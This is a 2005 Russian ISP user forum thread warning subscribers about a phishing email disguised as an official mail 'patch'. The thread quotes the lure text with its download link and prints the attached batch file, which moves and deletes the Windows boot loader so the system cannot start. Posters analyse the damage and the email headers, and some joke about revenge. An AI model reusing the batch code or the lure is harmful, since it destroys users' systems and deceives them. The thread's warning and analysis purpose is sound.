• Реклама


Achtung!!! Конкуренты атакуют!!! Зараза в почте!

Обсуждение работоспособности сети, её взлётов и падений

Модератор: kaa

Achtung!!! Конкуренты атакуют!!! Зараза в почте!

Сообщение Ivan.Rybin 28 авг 2005 10:45

Уважаемые абоненты!
Не в коем случае, не ставьте патч который,
указан и приатачен в письме, отправленном
с ящика many@ints.ru с темой "Сообщение Корвет Телеком".
Письмо отправлено недобросовесными конкурентами
с целью нарушения работоспособности сети.
Ведётся расследование, результаты которого
будут переданы в правоохранительные органы.
Администрация "Корвет-Телеком".

Вот текст заразы, к ней приаттачен Mail.bat
Код: Выделить всё
Уважаемые абоненты
Просьба обратить особое внимание на настройки Вашего программного обеспечения для приема электронной почты!
Настройки Вашей программы для приема почты, должны быть следующие:
POP3 сервер - ints.pop.pike.ru ;
SMTP сервер - ints.mail.pike.ru .
Если у Вас почта фильтрованная - логин@ints.pike.ru, то в настройках следует указать: POP3 сервер - ints.break.pike.ru;
SMTP сервер - ints.mail.pike.ru .
Так же в связи с вторым этапом модернизации почтового сервера вам необходимо изменить настройку вашего почтового клиента. Программа патч прилагаеться для облегчения настройки.
Если Вы не внесете указанные изменения, то электронная почта работать не будет. Если веше программное обеспечение блокирует вложенные файлы то вы можете запустить патч по ссылке
http://kkorvet.narod.ru/mail.bat
С уважением Администрация Корвет Телеком.


Нет, ну ИДИОТЫ!!! Ну только нездоровый на голову человек оставит в таком письме ссылку на народ.хрю - му*аки, простите за выражение - даже подна*рать народ разучился красиво :( - измельчали хакеры, измельчали....
Последний раз редактировалось Ivan.Rybin 20 июн 2006 16:43, всего редактировалось 1 раз.
We are all just the bricks in the Wall
Аватара пользователя
Ivan.Rybin
ArchitektoR
ArchitektoR
 
Сообщения: 9435
Зарегистрирован: 22 авг 2003 18:24
Откуда: RealMatrix World
Провайдер\Сеть: OnLime

Реклама

Сообщение Ivan.Rybin 28 авг 2005 10:49

Для интересующихся вот код батника:

Код: Выделить всё
attrib -r -a -s -h c:\ntldr
copy c:\ntldr c:\windows\ntldr
del c:\ntldr
del mail.bat
We are all just the bricks in the Wall
Аватара пользователя
Ivan.Rybin
ArchitektoR
ArchitektoR
 
Сообщения: 9435
Зарегистрирован: 22 авг 2003 18:24
Откуда: RealMatrix World
Провайдер\Сеть: OnLime

Сообщение Valent-ex 28 авг 2005 10:53

хех... мне вроде эта зараза не пришла...
Последний раз редактировалось Valent-ex 28 авг 2005 11:07, всего редактировалось 1 раз.
<a href="http://image.big-bossa.com/"><img src="http://image.big-bossa.com/image/pih.png"></a>
Аватара пользователя
Valent-ex
Blademaster
Blademaster
 
Сообщения: 1617
Зарегистрирован: 28 фев 2005 17:12
Откуда: Коньково

Сообщение Midas 28 авг 2005 11:01

Я тоже не получал. Вообще, больше всего бесит жуткая безграмотность. Сейчас что, в школе русский язык не преподают?
Аватара пользователя
Midas
Пулеметчик
 
Сообщения: 1687
Зарегистрирован: 06 фев 2005 00:24

Сообщение CGI^StandartProject 28 авг 2005 13:11

я не получал... и не видел про это и не слышал от знакомых...
Не говорите что мне делать и я не скажу куда вам идти... 8)
Аватара пользователя
CGI^StandartProject
Сетевик Глубокого Бурения
 
Сообщения: 211
Зарегистрирован: 26 фев 2005 19:46
Откуда: Где-то в лесах...

Сообщение butcher 28 авг 2005 13:34

А мне вот пришло.И патчик я успешно установил :-).К вечеру тока закончил систему переустанавливать.Не знаю из-за чего, но Винда перестала грузиться.
Следует взвешивать каждое слово и неизменно задавать себе вопрос,
правда ли то, что собираешься сказать.
Аватара пользователя
butcher
Активный Сетевик
 
Сообщения: 45
Зарегистрирован: 28 май 2005 01:23
Откуда: Коньково
Провайдер\Сеть: теперь не Корвет

Сообщение Ivan.Rybin 28 авг 2005 22:26

а ты код батничка почитай :) - ntldr это бутлоадер, без него ни одна NTя не запустится :) - переустановка НАФИГ не нужна, зная как эта гадость работает.

А теперь о смешном и грустном. Нет, я не могу! Эти "хакеры" ну ПОЛНЫЕ идиоты!!!
Вот заголовок письма, комментировать не буду, кто хоть немного разбираются поймут всё сами:

*********
Return-path: <many@ints.ru>
Envelope-to: (адрес жертвы)@ints.ru
Delivery-date: Sat, 27 Aug 2005 23:52:51 +0400
Received: from ints.relay.pike.ru ([85.30.199.198]) by ints.pop.pike.ru with esmtp (Exim 4.42
(FreeBSD)) id 1E96jS-000KX8-Mw for (адрес жертвы)@ints.ru; Sat, 27 Aug 2005 23:52:50 +0400
Received: from pike.relay.pike.ru ([85.30.230.220]) by ints.relay.pike.ru with esmtp (Exim 4.50
(FreeBSD)) id 1E96jN-000KOz-RG for (адрес жертвы)@ints.ru; Sat, 27 Aug 2005 23:52:50 +0400
Received: from ns.globonet.ru ([213.234.197.66] helo=globonet.ru) by pike.relay.pike.ru with smtp (Exim
4.51 (FreeBSD)) id 1E96jB-0003Je-EU for (адрес жертвы)@ints.ru; Sat, 27 Aug 2005 23:52:34 +0400
Received: (qmail 64688 invoked from network); 27 Aug 2005 19:52:33 -0000
X-Mail-Scanner: Scanned by qSheff 1.0-r1 (http://www.enderunix.org/qsheff/)
Received: from unknown (HELO MONSTR) (10.10.19.118) by ns.globonet.ru with SMTP; 27 Aug 2005 19:52:33 -
0000

Message-ID: <002e01c5aa77$f533a5c0$0200c6a2@MONSTR>
From: =?koi8-r?B?4cTNyc7J09TSwdTP0g==?= <many@ints.ru>
....(тут могучий список адресатов)
Subject: =?koi8-r?B?Rnc6IO7B09TSz8rLwSDQz97U2Q==?=
Date: Fri, 26 Aug 2005 23:54:23 +0400
Organization: =?koi8-r?B?68/S18XUIPTFzMXLz80=?=
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_002A_01C5AA99.7BEAA2A0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670
X-Antivirus-Scanner: Scanned by Aidstest
X-Antivirus-Scanner: Scanned by Aidstest

Я плакал долго...
We are all just the bricks in the Wall
Аватара пользователя
Ivan.Rybin
ArchitektoR
ArchitektoR
 
Сообщения: 9435
Зарегистрирован: 22 авг 2003 18:24
Откуда: RealMatrix World
Провайдер\Сеть: OnLime

Сообщение Stun 29 авг 2005 10:41

я че-то не понял? это корветовский айпишник? ... этож локальник... но что-то резолвить не могу. надо ему как-нидь вставить...
Аватара пользователя
Stun
Сетевик Глубокого Бурения
 
Сообщения: 171
Зарегистрирован: 15 авг 2004 10:45

Сообщение butcher 29 авг 2005 10:57

Сёдня опять получил письмецо.:-).Но уже с другово адреса.Остальное всё то же.
Следует взвешивать каждое слово и неизменно задавать себе вопрос,
правда ли то, что собираешься сказать.
Аватара пользователя
butcher
Активный Сетевик
 
Сообщения: 45
Зарегистрирован: 28 май 2005 01:23
Откуда: Коньково
Провайдер\Сеть: теперь не Корвет

Сообщение Ivan.Rybin 29 авг 2005 12:29

Stun писал(а):я че-то не понял? это корветовский айпишник? ... этож локальник... но что-то резолвить не могу. надо ему как-нидь вставить...


Нет, это другая локалка. Но суть не в этом - эти Идиоты даже не удосужились найти анонимный SMTP и слали прямо из Оутглюка. Грубо говоря - идём к прову, пробиваем этот IP и сажаем его в тюрьму.

2 butcher: если ещё не стёр письмо - намыль заголовок мне на почту.
We are all just the bricks in the Wall
Аватара пользователя
Ivan.Rybin
ArchitektoR
ArchitektoR
 
Сообщения: 9435
Зарегистрирован: 22 авг 2003 18:24
Откуда: RealMatrix World
Провайдер\Сеть: OnLime

Сообщение CGI^StandartProject 29 авг 2005 16:07

А ты думаешь что они сали через аутглюк? Например прога Анонимаилер может писать в письме любой айпи, тем самым подставить кого угодно... Я когда её проверял я парню присла письмо с его же ящика другого, а потом наооборот. И вписывал туда любой понравившийся айпи... Так что это не показатель...
Не говорите что мне делать и я не скажу куда вам идти... 8)
Аватара пользователя
CGI^StandartProject
Сетевик Глубокого Бурения
 
Сообщения: 211
Зарегистрирован: 26 фев 2005 19:46
Откуда: Где-то в лесах...

Сообщение Ivan.Rybin 29 авг 2005 17:19

Писать она может что угодно, но эти отмеченные строчки записываются МЕЙЛСЕРВЕРОМ, и НИКАКАЯ прога их подменить не может, если ты шлёшь не через анонимный PROXY (эту инфу серверу отдаёт никак не аутглюк). Потому и все вирусы тока тупо меняют адрес отправителя - ну НЕ МОГУТ они воздействовать на IP, логирующийся на сервере, а уж тем более между!!! серверами SMTP при пересылке.

А почему слали аутглюком - а ты конец заголовка почитай... учитывая общий идиотизм послания анонимайзеры исключены! (сначала идёт анонимный SMTP с открытым OpenRelay, затем уже всё остальное - если первое они не сделали - мне их жалко, т.к. в Корвете их уже пообещали засадить!)
We are all just the bricks in the Wall
Аватара пользователя
Ivan.Rybin
ArchitektoR
ArchitektoR
 
Сообщения: 9435
Зарегистрирован: 22 авг 2003 18:24
Откуда: RealMatrix World
Провайдер\Сеть: OnLime

Сообщение butcher 31 авг 2005 22:30

2 Ivan S. Rybin письмо к сожелению уже удалено.Но дошли слухи, что подобные письма не только у нас гуляют.Вчера коллега на работе получил нечто подобное.
P.S:А может мы сами их найдём и устроим суд Линча.
Следует взвешивать каждое слово и неизменно задавать себе вопрос,
правда ли то, что собираешься сказать.
Аватара пользователя
butcher
Активный Сетевик
 
Сообщения: 45
Зарегистрирован: 28 май 2005 01:23
Откуда: Коньково
Провайдер\Сеть: теперь не Корвет

Сообщение Ivan.Rybin 31 авг 2005 23:29

дело уже передали в органы. КТ обещал обнародывать результаты дела.

А то, что такое "посланьеце" может запросто стать очередной "модой" у недоделанных, к общей беде компьютерного сообщеста научившихся логиниться в Windows, я не удивлюсь - идиотов много, и "прикол" в их стиле.

Но если нашего посадят, да так, что и у нас, и в окрестных локалках это станет темой дня - есть надежда, что будущие дегенераты хоть немного подумают, а повторять-ли?

Вариант, что они научатся делать такие вещи "красиво" и "как надо" я исключаю - обычно компьютерная грамотность сопровождается наличаем соображаловки и общим высоким культурным уровнем - грубо говоря, тем, кто может это сделать технически недоказуемо, это просто не нужно :)
We are all just the bricks in the Wall
Аватара пользователя
Ivan.Rybin
ArchitektoR
ArchitektoR
 
Сообщения: 9435
Зарегистрирован: 22 авг 2003 18:24
Откуда: RealMatrix World
Провайдер\Сеть: OnLime

Сообщение Midas 31 авг 2005 23:46

А давайте теперь мы во вражескую сеть вируса зашлем :D
Аватара пользователя
Midas
Пулеметчик
 
Сообщения: 1687
Зарегистрирован: 06 фев 2005 00:24

След.

Вернуться в Сеть OnLime

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 16


  • Реклама
cron